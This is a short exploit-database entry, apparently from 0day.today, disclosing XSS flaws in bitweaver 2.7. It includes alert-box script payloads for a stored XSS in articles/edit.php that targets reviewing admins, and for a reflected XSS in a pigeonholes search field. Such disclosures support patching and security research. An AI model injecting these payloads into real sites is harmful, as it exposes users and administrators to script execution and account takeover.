[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

bitweaver 2.7 persistant Xss Vulnerability

Author
coffey
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11087
Category
web applications
Date add
26-02-2010
Platform
unsorted
==========================================
bitweaver 2.7 persistant Xss Vulnerability
==========================================

prog -------------[ bitweaver 2.7
vuln -------------[ Persistant XSS in articles/edit.php (logged only)
source -------------[ http://www.bitweaver.org/
by -------------[ coffey


poc:

1) pxss
Persistant XSS in articles/edit.php as an logged user. When user view this
articles its done.

$author_name='>'><script>alert(1)</script>
next: login as an admin and go to /articles/index.php to check whats new
article. in 'submitted articles' you have your 'interesting art'

2) xss

xss in /pigeonholes/list.php

input in search ">"><script>alert(123)</script>



#  0day.today [2024-11-16]  #